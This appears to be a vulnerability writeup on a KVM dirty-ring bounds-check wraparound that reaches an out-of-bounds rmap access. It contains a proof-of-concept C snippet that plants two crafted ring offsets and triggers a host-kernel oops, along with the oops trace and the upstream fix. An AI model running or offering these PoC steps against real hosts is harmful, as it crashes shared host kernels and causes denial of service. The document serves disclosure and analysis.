
A KVM dirty-ring OOB that the allocator quietly defuses

A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.

Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") — the original 5.10 introduction of the dirty ring.

Setup — the dirty ring is shared writable

KVM's dirty-ring tracking is the mechanism the host uses to tell the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The VMM mmaps the ring pages with PROT_READ | PROT_WRITE. That is intentional, because the VMM acks entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 does not strip VM_WRITE for dirty-ring pages, and nothing else polices which fields the VMM is allowed to scribble on.

The bug is that the kernel also reads the slot and offset fields back from the ring during reset — after the VMM has had a chance to overwrite them with values the kernel never wrote.

// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot   = READ_ONCE(entry->slot);    // attacker-controlled
next_offset = READ_ONCE(entry->offset);  // attacker-controlled

READ_ONCE prevents the compiler from re-reading the field and racing with itself; it does not validate that the value matches what the kernel originally wrote. The trust boundary between host and VMM is being crossed in the wrong direction here.

Root cause — the bounds check wraps in u64

Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:

// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
    return;

Both offset and __fls(mask) are 64-bit unsigned values. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the sum is 0x10000000000000000, which truncates to 0 in 64-bit arithmetic. Zero is less than npages, so the check passes. Only the sum wraps: offset itself, still 0xFFFFFFFFFFFFFFC1, is what propagates downstream.
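The wrap is easy to reproduce in userspace. The following is a minimal sketch, not kernel code: highest_bit() is a hypothetical stand-in for __fls() built on the GCC/Clang builtin __builtin_clzll, and old_check_rejects() mirrors only the arithmetic half of the pre-patch condition (the !memslot test is left out).

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's __fls(): index of the highest
 * set bit. Like __fls(), the result is undefined for mask == 0. */
static inline unsigned int highest_bit(uint64_t mask)
{
    return 63u - (unsigned int)__builtin_clzll(mask);
}

/* Arithmetic half of the pre-patch check. Returns true when the entry
 * would be rejected, false when it would be let through. */
bool old_check_rejects(uint64_t offset, uint64_t mask, uint64_t npages)
{
    /* The addition is done modulo 2^64, so a huge offset can wrap to a
     * small sum and slip under npages. */
    return (offset + highest_bit(mask)) >= npages;
}
```

With npages = 512, old_check_rejects(0xFFFFFFFFFFFFFFC1, 0x8000000000000001, 512) returns false, because the sum wraps to 0. The same offset with mask = 1 is rejected, because nothing is added and no wrap occurs.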

Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:

// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
    mask |= 1ull << delta;
    continue;
}

Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set; __fls(mask) = 63; the wrap fires.
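The signed-delta step can be checked in isolation. This sketch folds a second offset into a mask the way the quoted loop does. It assumes the mask starts at 1 for the first entry of a run, which the excerpt above does not show, and coalesce_pair() is a hypothetical helper name.

```c
#include <stdint.h>

#define BITS_PER_LONG 64

/* Returns the mask after trying to coalesce second_offset into a run
 * that starts at first_offset. Assumption: the run starts with mask = 1
 * (bit 0 stands for first_offset itself). */
uint64_t coalesce_pair(uint64_t first_offset, uint64_t second_offset)
{
    uint64_t mask = 1;
    /* Unsigned subtraction wraps, then the result is read as signed. */
    int64_t delta = (int64_t)(second_offset - first_offset);

    if (delta >= 0 && delta < BITS_PER_LONG)
        mask |= 1ull << delta;   /* entry joins the current run */

    return mask;                 /* unchanged if the entry did not fit */
}
```

coalesce_pair(0xFFFFFFFFFFFFFFC1, 0) yields 0x8000000000000001: the delta is 63, so bit 63 is set on top of bit 0.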

Downstream — OOB into the rmap array

The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:

// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];

// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
    rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                            PG_LEVEL_4K, slot);
    rmap_write_protect(rmap_head, false);
    mask &= mask - 1;
}

Bit 0 of mask corresponds to the first crafted entry, so the first loop iteration uses __ffs(mask) = 0 and idx evaluates to the raw offset, 0xFFFFFFFFFFFFFFC1, which is -63 when interpreted as a signed offset into the array. Since sizeof(struct kvm_rmap_head) = 8, the target is exactly 8 * 63 = 504 bytes before the rmap allocation. More generally, varying which bit in mask drives __fls yields a backward window of [-504, -8] bytes from rmap_array_base.
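The index-to-bytes conversion is plain pointer arithmetic. A minimal sketch, assuming the 8-byte element size stated above; rmap_byte_offset() is a hypothetical helper, not a kernel function.

```c
#include <stdint.h>

/* Taken from the text: sizeof(struct kvm_rmap_head) == 8. */
#define RMAP_HEAD_SIZE 8

/* Byte displacement of rmap[idx] from the array base when the unsigned
 * index is reinterpreted as a signed array offset. */
int64_t rmap_byte_offset(uint64_t idx)
{
    return (int64_t)idx * RMAP_HEAD_SIZE;
}
```

rmap_byte_offset(0xFFFFFFFFFFFFFFC1) is -504, and the nearest reachable element, idx = 0xFFFFFFFFFFFFFFFF, sits at -8.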

rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.

The half-step — where the rmap actually lives

The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:

// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);

__vcalloc() is a thin wrapper around __vmalloc_array_noprof(): always vmalloc, never slab. Every vmalloc area allocated through __get_vm_area_node() gets a guard page appended to its end unless VM_NO_GUARD is set, so neighbouring areas never abut: the page directly below one area's base is the guard page that ends the area beneath it. The rmap array does not set VM_NO_GUARD. The 4 KiB region directly preceding the rmap base is therefore an unmapped guard page, populated in the page tables only far enough for the walk to descend; the leaf PTE is zero.

The OOB window is [-504, -8] bytes relative to the rmap base. The guard page is 4096 bytes. The window fits inside the guard for every conceivable configuration of the allocator. The OOB load faults; the conditional write below it never executes.
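The containment claim can be checked exhaustively, since only 63 indices are reachable. This sketch assumes a page-aligned rmap base (vmalloc returns page-aligned addresses), a 4096-byte guard page, and 8-byte elements; window_inside_guard() is a hypothetical name.

```c
#include <stdbool.h>
#include <stdint.h>

#define GUARD_PAGE_SIZE 4096   /* assumption: 4 KiB pages */
#define RMAP_HEAD_SIZE  8      /* from the text */

/* For every k = __fls(mask) in 1..63 the wrapping offset is -k, so the
 * 8-byte load starts 8*k bytes below the base. Returns true if each
 * such load lies entirely within the page just below the base. */
bool window_inside_guard(void)
{
    for (int k = 1; k <= 63; k++) {
        int64_t start = -(int64_t)k * RMAP_HEAD_SIZE;  /* first byte read */
        int64_t end   = start + RMAP_HEAD_SIZE;        /* one past the last */

        if (start < -GUARD_PAGE_SIZE || end > 0)
            return false;
    }
    return true;
}
```

The deepest access starts at -504, well short of -4096, so the function returns true.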

Runtime verification

Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):

BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1   RBX: 8000000000000001
RDI: ffffaa6580034e08   RDX: ffffaa6580035000

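Every register lines up with the analysis: RAX holds the wrapped index, RBX the coalesced mask with bits 0 and 63 set, RDI the faulting address, and RDX a page-aligned address 504 bytes above it, consistent with the rmap base.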

This is not a "got unlucky and faulted" outcome — it is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.
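The addresses in the oops can be cross-checked against the index arithmetic. This sketch treats RDX as the rmap base, which is an inference from the values rather than something the trace states; the macro and function names are hypothetical.

```c
#include <stdint.h>

/* Values copied from the oops above. */
#define OOPS_RAX 0xffffffffffffffc1ULL   /* index */
#define OOPS_RDI 0xffffaa6580034e08ULL   /* faulting address */
#define OOPS_RDX 0xffffaa6580035000ULL   /* assumed: rmap array base */

/* Address of element idx in an array of 8-byte entries starting at
 * base. Unsigned arithmetic wraps modulo 2^64, which is how the huge
 * index turns into a small backward step. */
uint64_t indexed_address(uint64_t base, uint64_t idx)
{
    return base + idx * 8;
}
```

indexed_address(OOPS_RDX, OOPS_RAX) equals OOPS_RDI, and OOPS_RDX - OOPS_RDI is 0x1f8, i.e. 504 bytes.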

Reachability of the conditional write

The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so neither interpretation is ever evaluated and the write never executes.

The OOB access faults before any value reaches downstream code. It is a host-kernel oops, full stop.

Proof of concept

Two ring entries with crafted offset values and a KVM_RESET_DIRTY_RINGS ioctl are enough to oops the host on the spot:

// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd  = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
//     create a vCPU, run it long enough to push entries ...

// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
    PROT_READ | PROT_WRITE, MAP_SHARED,
    vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);

// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
    ring[i].flags = KVM_DIRTY_GFN_F_RESET;
    if (i == target_idx) {
        ring[i].slot   = 0;
        ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL;   // wraps the bound
    } else if (i == target_idx + 1) {
        ring[i].slot   = 0;
        ring[i].offset = 0;                       // delta = 63
    }
}

// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);

Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Not guest-triggerable — the ring is mapped only from the vCPU fd, which only the VMM holds.

Impact

Factor               Value
Attack vector        Local (VMM process with /dev/kvm)
Complexity           Low (mmap + two ioctls)
Privileges required  /dev/kvm access, typically kvm group
User interaction     None
Scope                Unchanged (VMM userspace crashes the host kernel)
Confidentiality      None (OOB load is consumed internally; no readback channel)
Integrity            None (the OOB access faults before any value is loaded)
Availability         High (deterministic host kernel oops/panic)

The upstream fix

The patch replaces one line with two. It adds a standalone offset >= memslot->npages test ahead of the sum, so short-circuit evaluation only reaches the addition once offset is known to be smaller than npages. memslot->npages is bounded well below U64_MAX and __fls(mask) < BITS_PER_LONG, so at that point offset + __fls(mask) is less than npages + 64 and cannot wrap.

--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);

Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).
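The patched condition can be exercised the same way as the original. A minimal userspace sketch of its arithmetic half, again using a hypothetical highest_bit() stand-in for __fls() built on the GCC/Clang builtin __builtin_clzll:

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for the kernel's __fls(); undefined for 0. */
static inline unsigned int highest_bit(uint64_t mask)
{
    return 63u - (unsigned int)__builtin_clzll(mask);
}

/* Arithmetic half of the patched check. Returns true when the entry
 * would be rejected. */
bool patched_check_rejects(uint64_t offset, uint64_t mask, uint64_t npages)
{
    /* Short-circuit: the sum is only evaluated once offset < npages,
     * so it is bounded by npages + 63 and cannot wrap for any
     * realistic npages. */
    return offset >= npages || offset + highest_bit(mask) >= npages;
}
```

The crafted pair (offset = 0xFFFFFFFFFFFFFFC1, mask = 0x8000000000000001) is now rejected on the first comparison, while in-range entries such as offset = 448 with the same mask against npages = 512 still pass.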

The rmap array is __vcalloc'd, so the OOB walks into vmalloc's guard page instead of adjacent kernel memory — the allocator decision, not the bounds check, is what kept this bounded.

References

Field            Value
Upstream commit  577a8d3bae05
Title            KVM: Reject wrapped offset in kvm_reset_dirty_gfn()
Fixes            fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
Stable           Cc: stable@vger.kernel.org; backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+)